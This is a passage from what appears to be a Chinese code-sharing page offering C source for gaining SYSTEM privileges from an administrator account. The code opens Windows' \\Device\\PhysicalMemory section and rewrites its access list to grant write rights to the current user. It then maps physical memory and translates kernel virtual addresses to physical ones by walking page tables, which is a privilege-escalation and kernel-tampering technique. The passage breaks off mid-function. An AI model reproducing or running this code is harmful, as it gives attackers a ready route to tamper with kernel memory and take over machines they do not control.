📄 管理员组获取系统权限的完美解决方案.html
字号:
SystemNotImplemented11,<br />
SystemInvalidInfoClass2,<br />
SystemInvalidInfoClass3,<br />
SystemTimeZoneInformation,<br />
SystemLookasideInformation,<br />
SystemSetTimeSlipEvent,<br />
SystemCreateSession,<br />
SystemDeleteSession,<br />
SystemInvalidInfoClass4,<br />
SystemRangeStartInformation,<br />
SystemVerifierInformation,<br />
SystemAddVerifier,<br />
SystemSessionProcessesInformation<br />
} SYSTEM_INFORMATION_CLASS;<br />
<br />
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION )<br />
(<br />
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,<br />
IN OUT PVOID SystemInformation,<br />
IN ULONG SystemInformationLength,<br />
OUT PULONG ReturnLength OPTIONAL<br />
);<br />
<br />
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(<br />
OUT PHANDLE SectionHandle,<br />
IN ACCESS_MASK DesiredAccess,<br />
IN POBJECT_ATTRIBUTES ObjectAttributes<br />
);<br />
<br />
typedef VOID (CALLBACK* RTLINITUNICODESTRING)( <br />
IN OUT PUNICODE_STRING DestinationString,<br />
IN PCWSTR SourceString<br />
);<br />
<br />
typedef struct _SYSTEM_HANDLE_INFORMATION<br />
{<br />
ULONG ProcessId;<br />
UCHAR ObjectTypeNumber;<br />
UCHAR Flags;<br />
USHORT Handle;<br />
PVOID Object;<br />
ACCESS_MASK GrantedAccess;<br />
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;<br />
<br />
RTLINITUNICODESTRING RtlInitUnicodeString;<br />
ZWOPENSECTION ZwOpenSection;<br />
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;<br />
HMODULE g_hNtDLL = NULL;<br />
PVOID g_pMapPhysicalMemory = NULL;<br />
HANDLE g_hMPM = NULL;<br />
<br />
BOOL InitNTDLL()<br />
{<br />
g_hNtDLL = LoadLibrary( "ntdll.dll" );<br />
if ( !g_hNtDLL )<br />
{<br />
return FALSE;<br />
}<br />
<br />
RtlInitUnicodeString =<br />
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");<br />
<br />
ZwOpenSection =<br />
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");<br />
<br />
ZwQuerySystemInformation =<br />
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );<br />
<br />
ZwQuerySystemInformation = <br />
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );<br />
<br />
return TRUE;<br />
}<br />
<br />
VOID CloseNTDLL()<br />
{<br />
if(g_hNtDLL != NULL)<br />
{<br />
FreeLibrary(g_hNtDLL);<br />
}<br />
}<br />
<br />
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)<br />
{<br />
<br />
PACL pDacl=NULL;<br />
PACL pNewDacl=NULL;<br />
PSECURITY_DESCRIPTOR pSD=NULL;<br />
DWORD dwRes;<br />
EXPLICIT_ACCESS ea;<br />
<br />
if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,<br />
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)<br />
{<br />
goto CleanUp;<br />
}<br />
<br />
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));<br />
ea.grfAccessPermissions = SECTION_MAP_WRITE;<br />
ea.grfAccessMode = GRANT_ACCESS;<br />
ea.grfInheritance= NO_INHERITANCE;<br />
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;<br />
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;<br />
ea.Trustee.ptstrName = "CURRENT_USER";<br />
<br />
<br />
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)<br />
{<br />
goto CleanUp;<br />
}<br />
<br />
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)<br />
{<br />
goto CleanUp;<br />
}<br />
<br />
CleanUp:<br />
<br />
if(pSD)<br />
LocalFree(pSD);<br />
if(pNewDacl)<br />
LocalFree(pNewDacl);<br />
}<br />
<br />
HANDLE OpenPhysicalMemory()<br />
{<br />
NTSTATUS status;<br />
UNICODE_STRING physmemString;<br />
OBJECT_ATTRIBUTES attributes;<br />
<br />
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );<br />
<br />
attributes.Length = sizeof(OBJECT_ATTRIBUTES);<br />
attributes.RootDirectory = NULL;<br />
attributes.ObjectName = &physmemString;<br />
attributes.Attributes = 0;<br />
attributes.SecurityDescriptor = NULL;<br />
attributes.SecurityQualityOfService = NULL;<br />
<br />
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);<br />
<br />
if(status == STATUS_ACCESS_DENIED){<br />
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);<br />
SetPhyscialMemorySectionCanBeWrited(g_hMPM);<br />
CloseHandle(g_hMPM);<br />
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);<br />
}<br />
<br />
if( !NT_SUCCESS( status ))<br />
{<br />
return NULL;<br />
}<br />
<br />
g_pMapPhysicalMemory = MapViewOfFile(<br />
g_hMPM,<br />
4,<br />
0,<br />
0x30000,<br />
0x1000);<br />
if( g_pMapPhysicalMemory == NULL )<br />
{<br />
return NULL;<br />
}<br />
<br />
return g_hMPM;<br />
}<br />
<br />
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)<br />
{<br />
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;<br />
if(VAddr>=0x80000000 && VAddr<0xa0000000)<br />
{<br />
PAddr=VAddr-0x80000000;<br />
return (PVOID)PAddr;<br />
}<br />
PGDE=BaseAddress[VAddr>>22];<br />
if ((PGDE&1)!=0)<br />
{<br />
ULONG tmp=PGDE&0x00000080;<br />
if (tmp!=0)<br />
{<br />
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);<br />
}<br />
else<br />
{<br />
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);<br />
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];<br />
if ((PTE&1)!=0)<br />
{<br />
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);<br />
UnmapViewOfFile((PVOID)PGDE);<br />
}<br />
else return 0;<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -